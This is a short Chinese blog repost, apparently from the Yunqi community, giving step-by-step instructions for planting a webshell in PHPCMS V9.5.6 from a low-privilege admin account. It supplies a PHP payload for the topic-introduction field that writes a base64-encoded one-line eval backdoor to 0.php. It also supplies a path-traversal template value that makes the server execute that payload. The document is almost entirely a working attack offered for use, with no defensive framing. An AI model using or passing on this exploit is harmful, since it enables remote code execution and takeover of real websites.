1. 云栖社区>
  2. PHP教程>
  3. 正文

PHPCMS后台低权限拿webSHELL

作者:用户 来源:互联网 时间:2017-12-01 17:09:05

程序缩略图

PHPCMS后台低权限拿webSHELL - 摘要: 本文讲的是PHPCMS后台低权限拿webSHELL, PHPCMS后台低权限拿webSHELL 前提是需要有管理专题的权限 测试版本 PHPCMS程序版本:Phpcms V9.5.6 Release 20140522 过程 1. 添加专题 专题名称:test 专题横幅:/1.jpg 专题缩略

PHPCMS后台低权限拿webSHELL

前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522

过程

1. 添加专题

专题名称:test

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>

生成静态:是

专题生成目录:test000

专题子分类:test test

其他默认 -> 提交

PHPCMS后台低权限拿webSHELL

2. 再次添加专题

专题名称:test1

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:

生成静态:是

专题生成目录:test111

专题子分类:test test

扩展设置

专题模板:value设置为 ../../../../html/special/test000/index

其他默认 -> 提交

PHPCMS后台低权限拿webSHELLPHPCMS后台低权限拿webSHELL

会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>

PHPCMS后台低权限拿webSHELL

以上是云栖社区小编为您精心准备的的内容,在云栖社区的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索程序 缩略图 ,以便于您获取更多的相关知识。